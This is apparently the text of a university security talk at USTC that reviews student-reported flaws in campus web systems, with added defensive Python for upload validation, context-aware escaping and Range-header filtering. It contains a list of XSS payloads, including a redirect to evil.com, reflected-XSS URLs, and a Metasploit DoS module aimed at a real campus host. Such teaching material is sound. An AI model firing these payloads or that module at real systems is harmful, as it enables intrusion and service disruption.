"Bojie Li" <bojieli (阿嚏) gmail.com>
root@plac /bin >> ./ssh linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from openssh 2.2.0 src greets: mray, random, big t, sh1fty, scut, dvorak ps. this sploit already owned cia.gov :/
Vulnerability ID: 77
Target: www.ustc.edu.cn (500 points)
Title: The academic affairs system gave me too low a grade
Impact vector: AV:A/AC:H/Au:M/C:C/I:C/A:C
A bug that causes no harm does not count as a vulnerability
Vulnerability ID: 58
Target: mis.teach.ustc.edu.cn (200 points)
Title: Thesis upload allows uploading a trojan
Impact vector: AV:N/AC:L/Au:N/C:C/I:C/A:P
Details: The thesis upload in the student portal of the integrated academic affairs system does not restrict the upload type: when submitting a thesis, the upload does not restrict the file type, the file chooser does not restrict the file type, and php, asp and similar files can be uploaded, creating a backdoor.
Fix: restrict the upload type to pdf, doc and similar.
A loophole in business logic does not count as a technical vulnerability
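The fix proposed in the report, restricting uploads to pdf/doc, is only as good as the check behind it. Below is an added example (not code from the deck or from the academic affairs system) of a server-side upload validator: it strips client-supplied paths, enforces an extension allowlist, rejects double extensions, and verifies the file's magic bytes against the claimed type. The allowlist, the signatures and the sample uploads are constructed for the example.

```python
import os
import re
from typing import Tuple

# Allowlist following the report's suggested fix (pdf, doc, etc.), extended with
# each format's well-known magic bytes so the decision does not rest on the
# client-supplied file name alone.
ALLOWED = {
    ".pdf": (b"%PDF-",),
    ".doc": (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",),  # OLE2 compound document
    ".docx": (b"PK\x03\x04",),                       # OOXML is a zip container
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, head: bytes) -> Tuple[bool, str]:
    """Decide whether an upload may be stored; head is the file's first bytes."""
    base = os.path.basename(filename.replace("\\", "/"))  # strip client paths
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension %s not in allowlist" % (ext or "(none)")
    if "." in stem:
        return False, "multiple extensions not allowed"  # e.g. thesis.php.pdf
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in file name"
    if not any(head.startswith(sig) for sig in ALLOWED[ext]):
        return False, "content does not match %s signature" % ext
    return True, "ok"


# Constructed sample uploads: (client file name, first bytes of the content).
SAMPLES = [
    ("thesis.pdf", b"%PDF-1.5\n%\xe2\xe3\xcf\xd3"),
    ("paper.docx", b"PK\x03\x04\x14\x00\x06\x00"),
    ("shell.php", b"<?php /* backdoor */ ?>"),
    ("thesis.php.pdf", b"%PDF-1.5"),
    ("thesis.pdf", b"<?php /* not a pdf */ ?>"),
    ("../../var/www/thesis.pdf", b"%PDF-1.4"),
]


def accepted_names(samples=SAMPLES):
    """Return the client names of the samples that pass validation."""
    return [name for name, head in samples if validate_upload(name, head)[0]]


if __name__ == "__main__":
    for name, head in SAMPLES:
        print(name, validate_upload(name, head))
```

Accepted files should additionally be stored under a server-generated name in a directory the web server does not execute scripts from; the name check alone does not replace that.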
Vulnerability ID: 57
Target: library self-service borrow/return machines (500 points)
Title: Unlimited renewals
Impact vector: AV:A/AC:L/Au:N/C:N/I:N/A:P
Details: There is no limit on the number of borrowings; a book can simply be returned and borrowed again before it is due, which makes the renewal feature pointless, and a book can be held indefinitely.
Fix: limit the number of times the same person can borrow the same book within a given period.
A user's own behaviour that harms the interests of third parties does not count as a vulnerability
Vulnerability ID: 69
Target: bb.ustc.edu.cn (300 points)
Title: Information leak of the students concerned
Impact vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Details: The course information section on the relevant course instructor's Blackboard (BB) homepage leaks student information; anyone with network access can view and download the roster without logging in or any verification.
Fix: The leak is caused by the complete absence of permission settings; set permissions so that login is required to view.
Blocking non-friends on Renren
The basic principle of XSS: data and code are not separated, which allows injection into HTML
<script>alert(1);</script>
<scRiPt>alert(1);</scrIPt>
<scr<script>ipt>alert(1)</scr<script>ipt>
<a href="javascript:alert(1)">18 岁以下免进</a>
<img src=x onerror=alert(1);>
<video src=x onerror=alert(1);>
<a onmouseover="javascript:window.onerror=alert;throw 1">
<meta http-equiv="refresh" content="0;url=//evil.com">
The basic principle of reflected XSS: a URL parameter is echoed back in the page
http://example.com/search?keyword=<script>alert(1)</script>
Vulnerability ID: 47
Target: lib.ustc.edu.cn (300 points)
Title: XSS in the news viewing page
Details: The links under Service Announcements contain an XSS vulnerability; the URLs contain Chinese characters, for example:
http://lib.ustc.edu.cn/电子资源/database/试用数据库/【试用】astm数据库/
http://lib.ustc.edu.cn/服务公告/【通知】办理2015届本科毕业生离校注销手续的通知/
Fix: The XSS vulnerability exists because the URLs contain Chinese characters; change them to URLs without Chinese characters or to percent-encoded URLs
If the URL parameter is only echoed inside an input box, the input box's quote sometimes needs to be closed first
http://example.com/search?keyword="><script>alert(1);</script>
http://example.com/search?keyword="><img src=x onerror=alert(1);>
http://example.com/search?keyword=" autofocus onfocus=alert(1)//
Example: http://stuhome.ustc.edu.cn/search.php
Is HTML entity escaping enough?
<a onclick="alert('{{ userinput }}')"></a>
User submits: ');alert('1
userinput = htmlspecialchars("');alert('1");
The HTML entities are decoded first, and only then is the JavaScript executed: <a onclick="alert('');alert('1');"></a>
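To make the two points above concrete (closing the input box's quote, and entity escaping failing inside a JavaScript string), here is an added example that is not part of the original deck. It uses Python's html.escape as a stand-in for PHP's htmlspecialchars with ENT_QUOTES and html.unescape to simulate the browser's attribute decoding; the template strings and the two payloads are taken from the slides, everything else is constructed.

```python
import html
import json

PAYLOAD_JS = "');alert('1"                     # the input from the slide
PAYLOAD_ATTR = '"><script>alert(1)</script>'   # the "close the quote" case


def render_entity_escaped(userinput):
    """Slide's vulnerable pattern: only HTML-entity escaping (as PHP
    htmlspecialchars() with ENT_QUOTES) of input placed in a JS string."""
    return '<a onclick="alert(\'%s\')"></a>' % html.escape(userinput, quote=True)


def render_js_then_html_escaped(userinput):
    """Encode for the innermost context first (JS string literal), then for
    the outer one (HTML attribute)."""
    js_literal = json.dumps(userinput)  # quoted, backslash-escaped JS string
    return '<a onclick="alert(%s)"></a>' % html.escape(js_literal, quote=True)


def attribute_value_seen_by_js(markup):
    """Simulate the browser: the HTML parser decodes entities in the attribute
    value before the JavaScript engine ever sees it."""
    start = markup.index('onclick="') + len('onclick="')
    end = markup.index('"', start)
    return html.unescape(markup[start:end])


def render_search_box(keyword, escape):
    """Reflected keyword echoed into an <input> value attribute, with or
    without attribute-aware escaping."""
    value = html.escape(keyword, quote=True) if escape else keyword
    return '<input name="keyword" value="%s">' % value


def tag_count(markup):
    """Number of tag openers the HTML parser would see; more than one means
    the payload broke out of the attribute."""
    return markup.count("<")


if __name__ == "__main__":
    print(attribute_value_seen_by_js(render_entity_escaped(PAYLOAD_JS)))
    print(attribute_value_seen_by_js(render_js_then_html_escaped(PAYLOAD_JS)))
    print(render_search_box(PAYLOAD_ATTR, escape=True))
```

Inside a `<script>` block rather than an attribute, the sequence `</script>` within the literal would also need escaping, which json.dumps does not do on its own.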
SQL injection principle: data and code are mixed together.
# msfconsole
use auxiliary/dos/http/apache_range_dos
show options
set RHOSTS wlt.ustc.edu.cn
set ACTION CHECK
run
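The CHECK action above only tells you whether a server still honours requests with many byte ranges. As an added defender-side example (not from the deck and not the Metasploit module's code), here is a small Range-header filter of the kind a reverse proxy could apply before passing requests to Apache; the limit of five ranges is an assumption taken from Apache's published workaround for this issue, and the sample requests are constructed.

```python
import re

# Assumption: the limit of five ranges follows Apache's published workaround
# for the Range-header DoS that auxiliary/dos/http/apache_range_dos checks for.
MAX_RANGES = 5
BYTES_PREFIX = re.compile(r"^\s*bytes\s*=\s*(.*)$", re.IGNORECASE)


def parse_ranges(value):
    """Parse a Range header into (start, end) pairs; None marks an open end.
    Returns None if the header is malformed."""
    m = BYTES_PREFIX.match(value)
    if not m:
        return None
    ranges = []
    for part in m.group(1).split(","):
        a, sep, b = part.strip().partition("-")
        if not sep or (a and not a.isdigit()) or (b and not b.isdigit()) or not (a or b):
            return None
        ranges.append((int(a) if a else None, int(b) if b else None))
    return ranges


def classify_request(headers):
    """'ok': pass through; 'drop-range': strip the header and serve the whole
    resource (what 'RequestHeader unset Range' does); 'reject': malformed."""
    value = headers.get("Range")
    if value is None:
        return "ok"
    ranges = parse_ranges(value)
    if ranges is None:
        return "reject"
    if len(ranges) > MAX_RANGES:
        return "drop-range"
    return "ok"


# Constructed sample requests: a resumed download, the many-overlapping-ranges
# pattern published for this issue, a malformed header, and no Range at all.
SAMPLES = {
    "resume": {"Range": "bytes=1000-"},
    "overlapping": {"Range": "bytes=0-," + ",".join("5-%d" % i for i in range(50))},
    "garbage": {"Range": "bytes=abc"},
    "plain": {},
}


def classify_all(samples=SAMPLES):
    """Classify every sample; useful as a quick self-check of the filter."""
    return {name: classify_request(h) for name, h in samples.items()}
```

Dropping the header degrades a legitimate multi-range client to a full download, which is the intended trade-off; rejecting outright would break such clients.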